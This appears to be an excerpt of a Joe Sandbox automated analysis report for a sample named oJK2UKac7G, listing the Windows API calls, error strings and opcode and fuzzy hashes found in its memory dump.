    • _wcslen.LIBCMT ref: 00C98558
    • _wcslen.LIBCMT ref: 00C985EF
    • _wcslen.LIBCMT ref: 00C98657
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
      • Part of subcall function 00C9B41F: RemoveDirectoryW.KERNEL32(?,?,?,00C98649,?), ref: 00C9B430
      • Part of subcall function 00C9B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00C98649,?), ref: 00C9B45E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    • Opcode ID: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction ID: 191c7499bc1f77b7e1cedf488cdf0c5c6dca7cd4feb7ba4f0876305a0cd9e77e
    • Opcode Fuzzy Hash: d9f89dee1c430f339a02c30b63ceb9f389ad4dac8135032bcbeb1b366ed54d6c
    • Instruction Fuzzy Hash: 5131EB72800254AADF21AF60CC49BEE3365AF46380F054496F955A714ADF71DF8DDB90
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CBA861,?,00000000,?,00000001,?,?,00000001,00CBA861,?), ref: 00CBDB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CBDC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CB80A1,?), ref: 00CBDC20
    • __freea.LIBCMT ref: 00CBDC29
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: 1340d9a783dd7b76575a9f53aece5f6190691ce728aa07817d79c1a031b9697c
    • Instruction ID: fe526b4ef4e3022f066b3dade46a4fc84b414cec3a25bc5d2ab4c4169ee00079
    • Opcode Fuzzy Hash: 1340d9a783dd7b76575a9f53aece5f6190691ce728aa07817d79c1a031b9697c
    • Instruction Fuzzy Hash: 7131CD72A0020AABDF289F64DC41EEE7BA5EF00320F094528FC16D7190EB35CE90DB90
    APIs
    • GetDC.USER32(00000000), ref: 00CAB666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CAB675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAB683
    • ReleaseDC.USER32(00000000,00000000), ref: 00CAB691
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    • Opcode ID: 4a5d7cd93136d5cd36b60411c6fa931ef93dd6485a1a818440db55a80ae19c50
    • Instruction ID: 5e624b4ff0510d1212575a57be306aea8b30998469327027379a1b73aa7ccc34
    • Opcode Fuzzy Hash: 4a5d7cd93136d5cd36b60411c6fa931ef93dd6485a1a818440db55a80ae19c50
    • Instruction Fuzzy Hash: 2FE0EC31986A60A7D3601B60AC1DBAE3F64AB16712F054006F705961D0CBB05400CFD6
    APIs
    • _free.LIBCMT ref: 00CBC4D4
      • Part of subcall function 00CB51D6: IsProcessorFeaturePresent.KERNEL32(00000017,00CB51A8,00000050,00CC4ADC,?,00C9EA30,00000004,00CD3070,?,?,00CB51B5,00000000,00000000,00000000,00000000,00000000), ref: 00CB51D8
      • Part of subcall function 00CB51D6: GetCurrentProcess.KERNEL32(C0000417,00CC4ADC,00000050,00CD3070), ref: 00CB51FA
      • Part of subcall function 00CB51D6: TerminateProcess.KERNEL32(00000000), ref: 00CB5201
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction ID: 5ac636ba2ae27e0d4e83f6baf74a3369fee84ec3771e2e27f654c9b52d1d213f
    • Opcode Fuzzy Hash: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction Fuzzy Hash: 2B516B76E0021AAFDF14DFA8C881AFDBBB5EF58310F24816AE854E7341E6759F019B50
    APIs
    • __EH_prolog.LIBCMT ref: 00C980C3
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00C9B991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C98262
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    • Opcode ID: 870449fa31c7f779a90d24cbc4788c5b1cd5c25193d909d108f726c9979da9ef
    • Instruction ID: daf260af2375ca3cbe1b9f104dc6ee39b045e3f94a57b25db2d7addfc29b864c
    • Opcode Fuzzy Hash: 870449fa31c7f779a90d24cbc4788c5b1cd5c25193d909d108f726c9979da9ef
    • Instruction Fuzzy Hash: 82515171800568AAEF25EB60CD5AEEE737CEF46300F0440D5B606A7092DB745F89EF61
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    • Opcode ID: b09b2686ae674dc6d1461ecc31962e6275c6a55c268a276db17550baca9c73e1
    • Instruction ID: 81baaefdc054865328c45ba9e8749e240804c97e0053d6e3821a901189acb38b
    • Opcode Fuzzy Hash: b09b2686ae674dc6d1461ecc31962e6275c6a55c268a276db17550baca9c73e1
    • Instruction Fuzzy Hash: 9B21D2325083175AD731EBA4DC85AABB3ECDF86768F10043AF554C3141EB61EE489BA6
    APIs
      • Part of subcall function 00CA0620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA063F
      • Part of subcall function 00CA0620: GetProcAddress.KERNEL32(00CDA1F0,CryptUnprotectMemory), ref: 00CA064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,00CA0690), ref: 00CA0723
    Strings
    • CryptUnprotectMemory failed, xrefs: 00CA071B
    • CryptProtectMemory failed, xrefs: 00CA06DA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 54b6b8784b4bc8a4b15c9a60822f36757501cff380b0ee444958919a5b362ea1
    • Instruction ID: 37c9698e731a2ccce98f0496c1d3c7a0590ee18950156866ce711e29527998f1
    • Opcode Fuzzy Hash: 54b6b8784b4bc8a4b15c9a60822f36757501cff380b0ee444958919a5b362ea1
    • Instruction Fuzzy Hash: D511AB32A01622ABDF155F30CC55F6E3B54EF4A7ACF108116FC109B281DB30AE818AD5
    APIs
    • _swprintf.LIBCMT ref: 00C9CDE7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    • Opcode ID: 6d769c71b29547846bd8ea5aeacf4a444582cc10a3965f12addddd9b1e4ca42c
    • Instruction ID: ac2884409562ed16f9eeb90c14ee238b97670cc7d1a52b0d0516e9f131695916
    • Opcode Fuzzy Hash: 6d769c71b29547846bd8ea5aeacf4a444582cc10a3965f12addddd9b1e4ca42c
    • Instruction Fuzzy Hash: A10164230043117ADE306B799CCEDABBBECEF853B0B40841AF496C7082EA34D900D2B1
    APIs
    • CreateThread.KERNEL32(00000000,00010000,00CA2470,?,00000000,00000000), ref: 00CA235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 00CA23A2
      • Part of subcall function 00C976E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C97707
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: 71619bd3f2e4fdfc985580cb675a691286b12c481a18ea3ab381c53ea354714e
    • Instruction ID: 479f0f9c1cf0d7469b958f7d101f2ef6c169f5190ea88b2fc3491ff8f6860af0
    • Opcode Fuzzy Hash: 71619bd3f2e4fdfc985580cb675a691286b12c481a18ea3ab381c53ea354714e
    • Instruction Fuzzy Hash: 480126B22463076FDB246F68DC85F667398EF42716F10023EF792521D0CAA1A8808725
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,00CA2516,?), ref: 00CA2302
    • GetLastError.KERNEL32(?), ref: 00CA230E
      • Part of subcall function 00C976E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C97707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CA2317
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 350465ce987fb312e6a1272434363d8efbdd9eade9ffaf43de011946c042e3b0
    • Instruction ID: 07f56c8baff8dbf2be4a9818e32ac0be077adb92f4e7c30acc4f2cbf6631222f
    • Opcode Fuzzy Hash: 350465ce987fb312e6a1272434363d8efbdd9eade9ffaf43de011946c042e3b0
    • Instruction Fuzzy Hash: EBD02B3240943133CD002328AC0DF6E38146F23330F244314F339511F0CA60095142A2
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,00C9ED75,?), ref: 00C9F5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C9ED75,?), ref: 00C9F5D1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: 9178491eeb4a1514463244fb1bfa0ed0479a6e619e1e547d66cb54d0d6acb26e
    • Instruction ID: c95d977c1d5e4e8b40393963285bb1692328d3c40b811931d3eb9107b75ee8d8
    • Opcode Fuzzy Hash: 9178491eeb4a1514463244fb1bfa0ed0479a6e619e1e547d66cb54d0d6acb26e
    • Instruction Fuzzy Hash: 7DC0123128435066DA342771AC1DF872E986B00715F06445CF601DA1C0DEE5C84186A0